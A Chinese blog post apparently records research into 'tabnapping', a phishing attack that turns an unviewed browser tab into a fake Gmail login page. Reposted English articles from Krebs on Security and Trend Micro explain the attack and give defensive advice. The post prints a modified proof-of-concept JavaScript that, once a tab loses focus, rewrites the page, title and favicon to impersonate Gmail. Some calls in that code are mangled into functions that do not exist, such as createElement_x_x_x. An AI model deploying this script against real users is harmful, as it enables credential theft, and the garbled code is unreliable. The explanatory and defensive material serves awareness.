在 t00ls 看到了一个帖子“谈一下新式钓鱼攻击 - 浏览器标签劫持”,于是乎研究了一下,在此做一下记录,以后可能用得着。
谈一下新式钓鱼攻击 - 浏览器标签劫持,用假冒浏览器标签进行新式钓鱼攻击,浏览器页签挟持 Tabnapping:利用假冒浏览器标签进行的新式钓鱼攻击。
这种攻击最早大概在一年半前就有了,资料如下:
2010-05-24,Posts Tagged: tabnapping,Devious New Phishing Tactic Targets Tabs,http://krebsonsecurity.com/tag/tabnapping/
2010-07-10,Tabnapping: New Phishing Attack Works Through Impostor Browser Tabs,http://www.trendmicro.com/ftp/documentation/general/TRENDMICRO_JUL10/trendsetter_july10_tabnap.html
2010-07-29 07:45,浏览器页签挟持Tabnapping:利用假冒浏览器标签进行的新式钓鱼攻击,http://domynews.blog.ithome.com.tw/post/1252/76345
我再说一个与此类似的钓鱼:
【分析】腾讯独立域名QQ空间被钓鱼,腾讯官网被黑,被植入钓鱼页面!连接:https://lcx.cc/post/1757/
原理就是注册一个QQ空间,然后做一个模板,登陆框模板,同样是让受害者认为已退出,重新登录QQ。
点击登陆后,打开的是钓鱼页面,同时记录了账号密码等资料。
由于是腾讯域名,而且模板高仿,上当几率很大。。。。。
知道这种方式是在一个境外的黑客论坛看到一篇帖子,大家在交流一种新的攻击方式,原理是利用 javascript 来侦测已开启的标签,然后将该页面修改成和原始网页长相一样的假页面,进行钓鱼攻击。
论坛里把这种方式定义为 Tabnapping ,另外还公布了一个POC,下载到本地研究了下,是一个JS脚本,该脚本通过 window.onblur 事件来触发页面的修改,在修改页面内容的同时,还修改了页面上的 favicon 和 titile ,以达到深度的欺骗效果。
这里举一个案例,如果某个攻击者想要利用该方式去获取某个目标的Gmail账号密码,那攻击者只需仿Gmail登陆窗口做一个钓鱼页面,然后在页面上多写一句话“您的会话已超时,请重新登陆”,
当目标在Gmail里打开一封来自攻击者发的邮件时,目标对邮件里的链接产生兴趣,在一个新Tab上打开了攻击者制作的包含 Tabnapping (下面用TN表示)JS脚本的那个页面链接,目标看完这个Tab去看其他Tab的时候,
被感染TN脚本的Tab标签就会自动在后台搜索目标是否已经打开Gmail,如果打开,那这个Tab就在攻击者设定的几秒钟内修改成那个钓鱼页面。
当目标回头点开那个Tab时,发现有一个“会话已超时”的Gmail登陆页面,大意的目标会顺手输入他的账号密码进行登陆,在重定向到真实邮箱界面的同时,目标的账号密码已经被保存到了攻击者的服务器或邮箱里,
之所以可以重定向登陆到真实的邮箱界面里,是因为目标已经在另外的Tab已经打开了一个Gmail,之前的COOKIES还是存活的。
这样整个钓鱼过程就结束了。
分析就到这里,过多的分析也是惘然,很多时候,攻击与防御都是思路上的碰撞。
这里附一份修改后的POC样本(javascript),chrome/firefox/safari/ie 6 7 8 9下都测试正常,不过IE下ICO不能被修改。
代码如下:
(function(){ var TIMER = null; var HAS_SWITCHED = false; // Events window.onblur = function(){ TIMER = setTimeout(changeItUp, 5000); parent.window.location.hash="https://mail.google.com"; } window.onfocus = function(){ if(TIMER) clearTimeout(TIMER); } // Utils function setTitle(text){ document.title = text; } // This favicon object rewritten from: // Favicon.js - Change favicon dynamically [http://ajaxify.com/run/favicon]. // Copyright (c) 2008 Michael Mahemoff. Icon updates only work in Firefox and Opera. favicon = { docHead: document.getElementsByTagName_r("head")[0], set: function(url){ this.addLink(url); }, addLink: function(iconURL) { var link = document.createElement_x_x_x("link"); link.type = "image/x-icon"; link.rel = "shortcut icon"; link.href = iconURL; this.removeLinkIfExists(); this.docHead.appendChild(link); }, removeLinkIfExists: function() { var links = this.docHead.getElementsByTagName_r("link"); for (var i=0; i<links.length; i++) { var link = links[i]; if (link.type=="image/x-icon" && link.rel=="shortcut icon") { this.docHead.removeChild(link); return; // Assuming only one match at most. } } }, get: function() { var links = this.docHead.getElementsByTagName_r("link"); for (var i=0; i<links.length; i++) { var link = links[i]; if (link.type=="image/x-icon" && link.rel=="shortcut icon") { return link.href; } } } }; function createShield(){ div = document.createElement_x_x_x("div"); div.style.position = "fixed"; div.style.top = 0; div.style.left = 0; div.style.backgroundColor = "white"; div.style.width = "100%"; div.style.height = "100%"; div.style.textAlign = "center"; document.body.style.overflow = "hidden"; document.body.topMargin="0px"; document.body.innerHTML=''; img = document.createElement_x_x_x("iframe"); img.style.width = "100%"; img.style.height="1000px"; img.style.border="0px" img.src = "http://www.baidu.com"; var oldTitle = document.title; var oldFavicon = favicon.get() || "/favicon.ico"; div.appendChild(img); document.body.appendChild(div); img.onclick = function(){ div.parentNode.removeChild(div); document.body.style.overflow = "auto"; setTitle(oldTitle); favicon.set(oldFavicon) } } function changeItUp(){ if( HAS_SWITCHED == false ){ createShield("https://mail.google.com"); setTitle( "Gmail: Email from Google"); favicon.set("https://mail.google.com/favicon.ico"); HAS_SWITCHED = true; } } })();
浏览器页签挟持Tabnapping:利用假冒浏览器标签进行的新式钓鱼攻击
最近发现的一款新式钓鱼手法实在太新又太陌生,以致没有人知道该如何称呼它。我们就暂时叫它做「浏览器页签挟持(tabnapping)」,这手法利用Javascript来侦测已开启但目前未被浏览的页签。然后将该页面改造成和原始网页很类似的假页面。
受害者在开启多个浏览页签,分别浏览了几个网页后,假如又想再度浏览之前看过的页签,一不小心就点击了假网站,因为看到的是熟悉的偏爱图标(favicon),网页标题及内容,一般不疑有他而依照显示重新登录数据登入。在此当下,钓客就捕捉到受害者的真实登入数据。当资料到手后,受害者会被重新导回去原始网页里面,一切像是没发生一样。
举例来说,假设你是Gmail的使用者。你开了一个页签来进入Gmail,一个页签到新闻网页,以及一个页签到刚好是受感染的网站。你浏览新闻网站,没发现受感染的网站已变形为看来像是Gmail的登录网页。当你展开受感染网站的页签时,你以为自己只是为要求登入到Gmail中。你输入了登入数据,钓客取得了你的数据然后再将你重导回真的Gmail中,而你能登入的原因是你已经在第三个页签这边登入到真的Gmail中了。
听得雾煞煞,对吧?
重点在于:当你在多重页签间工作时,留意你进到哪里了。当你被要求输入进入账户时,即使是知名的电子邮件或其它服务网站,花一点时间回想你是否已经登入。点此(here)阅读此骇人的新钓鱼手法细节。
Devious New Phishing Tactic Targets Tabs
Most Internet users know to watch for the telltale signs of a traditional phishing attack: An e-mail that asks you to click on a link and enter your e-mail or banking credentials at the resulting Web site. But a new phishing concept that exploits user inattention and trust in browser tabs is likely to fool even the most security-conscious Web surfers.
As Mozilla Firefox creative lead Aza Raskin describes it, the attack is as elegant as it is simple: A user has multiple tabs open, and surfs to a site that uses special javacript code to silently alter the contents of a tabbed page along with the information displayed on the tab itself, so that when the user switches back to that tab it appears to be the login page for a site the user normally visits.
Consider the following scenario: Bob has six or seven tabs open, and one of the sites he has open (but not the tab currently being viewed) contains a script that waits for a few minutes or hours, and then quietly changes both the content of the page and the icon and descriptor in the tab itself so that it appears to be the login page for Gmail.
In this attack, the phisher need not even change the Web address displayed in the browser’s navigation toolbar. Rather, this particular phishing attack takes advantage of user trust and inattention to detail, or what Raskin calls “the perceived immutability of tabs.” Then, as the user scans their many open tabs, the favicon and title act as a strong visual cue, and the user will most likely simply think they left a Gmail tab open.
“When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in,” Raskin explained. “After the user has enter they have entered their login information and sent it back your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.”
Raskin includes a proof-of-concept at his site, which is sort of creepy when you let it run. In fact, at least once while composing this blog post in Firefox I went to click on the tab that had my Gmail inbox open, only to discover I’d accidentally clicked on Raskin’s page, which had morphed into the fake Gmail site in the interim.
It’s important to keep in mind that this attack could be used against any site, not just Gmail. Also, Raskin includes a few suggestions about how this attack could be made far sneakier — such as taking advantage of CSS history attacks.
Of course, if you are browsing with the excellent “Noscript” add-on and this is a site you have not allowed to run javascript, the proof-of-concept won’t work until you allow javascript on the page. It did not work completely against the Safari browser on my Mac (no favicon), and the test page failed completely against Google Chrome. [Update: As several readers have correctly pointed out, this attack does in fact work against Chrome, although it doesn't seem to change the favicon in Chrome tabs].
I’m left wondering what this new form of phishing will be called if it is ever adopted by the bad guys. Tabnabbing? Tabgrabbing? See if you can coin a better phrase in the comments below.
Update, May 25, 7:55 p.m. ET: Researcher Aviv Raff has posted an interesting proof-of-concept of his own that shows how this attack can work against Firefox even when users have the Noscript add-on installed and in full paranoid mode. Raff crafted his page, which is a mock up of this blog post, to morph into an image of the Gmail login page, and it will reload every 20 seconds but will only change to the sample phish page if you move to another tab with your mouse, or after 10 reloads (in case you moved with the keyboard). So it will change only after 3 minutes or so, unless you move to another tab with your mouse.
“I was trying to find a way to work around the javascript need for the [proof-of-concept],” Raff said in an instant message. “First I was able to do this without knowing if the user moved to a new tab. Now I can almost be sure of that.”
Update, May 27, 11:41 p.m. ET: For Firefox users with the Noscript plugin, there is an update to the program that can block these types of tabnabbing attacks.
Tabnapping: New Phishing Attack Works Through Impostor Browser Tabs
A recently discovered phishing tactic is so new, and so unknown, that nobody really knows what to call it. For now, we'll call it "tabnabbing"—an exploit that uses javascript to change unviewed browser tabs into imitations of commonly visited sites. The victim, hopping from tab to tab, clicks on the phony site and sees a familiar favicon, page title, and content that's convincing enough to persuade them to log in. At that point, the phisher captures the victim's real login information.
For example, let's say you're a Gmail user. You've got a tab open to Gmail, a tab open to a news site, and a tab open to what happens to be an infected site. You browse the news site, unaware of the fact that the infected site has morphed into what looks like a Gmail login. When you open the tab to the infected site, you think you're just being asked to log into Gmail. You do so, and the phisher collects your information and then redirects you to the real Gmail—which you're able to log into, because you're already logged into the real Gmail on your third tab.
Confusing, right?
The point is this: when you're working with multiple tabs, pay attention to where you're visiting. Any time you're asked to log into an account, even if it's with a reputable email or other service, take a moment to ask yourself if you haven't already logged into it. Click here for more details on this scary new form of phishing, and stay tuned more details on what Trend Micro is doing to foil it.